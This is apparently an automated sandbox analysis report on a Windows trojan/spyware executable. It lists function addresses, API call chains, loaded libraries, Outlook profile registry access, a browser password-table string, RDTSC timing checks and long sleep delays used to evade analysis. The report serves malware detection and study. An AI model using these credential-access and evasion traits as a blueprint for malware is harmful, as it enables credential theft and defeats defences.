Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663E420
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663CC27
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663322A
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06630928
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06637628
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06635E2F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663F72F
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663A130
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06631237
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06638937
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06633238
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663CC38
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663D100
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06638E00
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06630007
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663B907
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06636308
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663FC08
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06632908
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663E412
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06638E10
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06632918
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_0663B918
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06630918
Source: C:\Users\user\Desktop\OeM750ajqm.exe | Code function: 4_2_06637618
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663A11F4_2_0663A11F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06634B1D4_2_06634B1D
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06637AE14_2_06637AE1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663BDE04_2_0663BDE0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06633FE84_2_06633FE8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06634FE84_2_06634FE8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663E8E84_2_0663E8E8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06631FE84_2_06631FE8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663A5E84_2_0663A5E8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06637AF04_2_06637AF0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663D0F04_2_0663D0F0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066362FA4_2_066362FA
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06631FF84_2_06631FF8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663A5F84_2_0663A5F8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663AAC04_2_0663AAC0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066392C74_2_066392C7
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066316CA4_2_066316CA
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066336C84_2_066336C8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663D5C84_2_0663D5C8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066367D04_2_066367D0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663BDD04_2_0663BDD0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06634FD74_2_06634FD7
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663E8D94_2_0663E8D9
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066316D84_2_066316D8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066392D84_2_066392D8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06633FD84_2_06633FD8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066354A14_2_066354A1
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066397A04_2_066397A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06637FA74_2_06637FA7
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06630DA94_2_06630DA9
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06632DA84_2_06632DA8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663C2A84_2_0663C2A8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066354B04_2_066354B0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663EDB04_2_0663EDB0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663AAB04_2_0663AAB0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663D5B74_2_0663D5B7
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066336BA4_2_066336BA
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06630DB84_2_06630DB8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06637FB84_2_06637FB8
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066367BF4_2_066367BF
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066384804_2_06638480
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066304894_2_06630489
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066324884_2_06632488
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663AF884_2_0663AF88
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06636C884_2_06636C88
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663DA904_2_0663DA90
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663C2974_2_0663C297
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06632D9A4_2_06632D9A
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663979A4_2_0663979A
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066304984_2_06630498
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06636C984_2_06636C98
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0663ED9F4_2_0663ED9F
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0665BE104_2_0665BE10
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066557C04_2_066557C0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0665F5A04_2_0665F5A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06654E604_2_06654E60
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06651C604_2_06651C60
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066532404_2_06653240
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066500404_2_06650040
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066548204_2_06654820
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066516204_2_06651620
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0665F2284_2_0665F228
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06652C004_2_06652C00
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066548104_2_06654810
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_0665F2184_2_0665F218
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066528E04_2_066528E0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06653EC04_2_06653EC0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_06650CC04_2_06650CC0
            Source: C:\Users\user\Desktop\OeM750ajqm.exeCode function: 4_2_066554A04_2_066554A0
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: String function: 00402C5E appears 52 times
            Source: OeM750ajqm.exe, 00000003.00000002.1448370481.0000000000437000.00000002.00000001.01000000.00000004.sdmp  Binary or memory string: OriginalFilenamegaveafgifternes atrocities.exeDVarFileInfo$ vs OeM750ajqm.exe
            Source: OeM750ajqm.exe, 00000004.00000002.2555581855.0000000036B67000.00000004.00000010.00020000.00000000.sdmp  Binary or memory string: OriginalFilenameUNKNOWN_FILET vs OeM750ajqm.exe
            Source: OeM750ajqm.exe, 00000004.00000002.2525482896.0000000000437000.00000002.00000001.01000000.00000004.sdmp  Binary or memory string: OriginalFilenamegaveafgifternes atrocities.exeDVarFileInfo$ vs OeM750ajqm.exe
            Source: OeM750ajqm.exe, 00000004.00000002.2532604469.00000000066A4000.00000004.00000020.00020000.00000000.sdmp  Binary or memory string: OriginalFilenameclr.dllT vs OeM750ajqm.exe
            Source: OeM750ajqm.exe  Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine  Classification label: mal100.troj.spyw.evad.winEXE@3/25@5/5
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 3_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 4_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 3_2_004048F0 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 3_2_00402198 CoCreateInstance,MultiByteToWideChar
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  File created: C:\Program Files (x86)\skjaldedigtningen.ini
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  File created: C:\Users\user\afsvampning
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Mutant created: NULL
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  File created: C:\Users\user\AppData\Local\Temp\nsk6AFA.tmp
            Source: OeM750ajqm.exe  Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036EDE000.00000004.00000800.00020000.00000000.sdmp, OeM750ajqm.exe, 00000004.00000002.2555642675.0000000036EEE000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: OeM750ajqm.exe  Virustotal: Detection: 58%
            Source: OeM750ajqm.exe  ReversingLabs: Detection: 39%
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  File read: C:\Users\user\Desktop\OeM750ajqm.exe
            Source: unknown  Process created: C:\Users\user\Desktop\OeM750ajqm.exe "C:\Users\user\Desktop\OeM750ajqm.exe"
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Process created: C:\Users\user\Desktop\OeM750ajqm.exe "C:\Users\user\Desktop\OeM750ajqm.exe"
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: version.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: gpapi.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: ncrypt.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: ncryptsslp.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: version.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: rasapi32.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: rasman.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: rtutils.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: dhcpcsvc6.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: dhcpcsvc.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Section loaded: secur32.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  File written: C:\Users\user\AppData\Local\Temp\tmc.ini
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: OeM750ajqm.exe  Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Yara match  File source: 00000003.00000002.1450395666.000000000731A000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 3_2_6D6C1B28 GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 4_2_06529C30 push esp; retf 0654h  4_2_06529D55
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 4_2_06528C2F pushfd ; iretd  4_2_06528C30
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 4_2_06528DDF push esp; iretd  4_2_06528DE0
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 4_2_065268F1 push es; ret  4_2_06526900
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Code function: 4_2_0652891E pushad ; iretd  4_2_0652891F
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  File created: C:\Users\user\AppData\Local\Temp\nst74DF.tmp\System.dll
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\OeM750ajqm.exe  API/Special instruction interceptor: Address: 7D07734
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  API/Special instruction interceptor: Address: 4077734
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  RDTSC instruction interceptor: First address: 7CC82A0 second address: 7CC82A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F03F0D3D81Ah 0x00000004 test dx, FCADh 0x00000009 cmp ebx, ecx 0x0000000b jc 00007F03F0D3D79Bh 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  RDTSC instruction interceptor: First address: 40382A0 second address: 40382A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F03F1161BAAh 0x00000004 test dx, FCADh 0x00000009 cmp ebx, ecx 0x0000000b jc 00007F03F1161B2Bh 0x0000000d inc ebp 0x0000000e inc ebx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Memory allocated: 6520000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Memory allocated: 36C80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Memory allocated: 38C80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 599889
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 599781
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 599666
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 599562
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 599453
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 599343
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 599234
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 599125
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 599015
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 598906
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 598797
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 598687
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 598578
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 598468
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 598359
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 598248
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 598140
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 598031
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 597921
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 597779
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 597659
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 597527
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 597421
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 597298
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 597172
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 597062
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 596953
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 596843
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 596734
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 596625
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 596515
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 596406
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 596297
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 596187
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 596078
            Source: C:\Users\user\Desktop\OeM750ajqm.exe  Thread delayed: delay time: 595968
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595859Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595750Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595640Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595531Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595420Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595312Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595202Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 595092Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594983Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594874Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594765Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594653Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeThread delayed: delay time: 594540Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeWindow / User API: threadDelayed 8273Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeWindow / User API: threadDelayed 1584Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nst74DF.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\OeM750ajqm.exeAPI coverage: 0.2 %
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep count: 34 > 30Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -31359464925306218s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599889s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3576Thread sleep count: 8273 > 30Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3576Thread sleep count: 1584 > 30Jump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599666s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598797s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\OeM750ajqm.exe TID: 3996Thread sleep time: -598578s >= -30000sJump to behavior
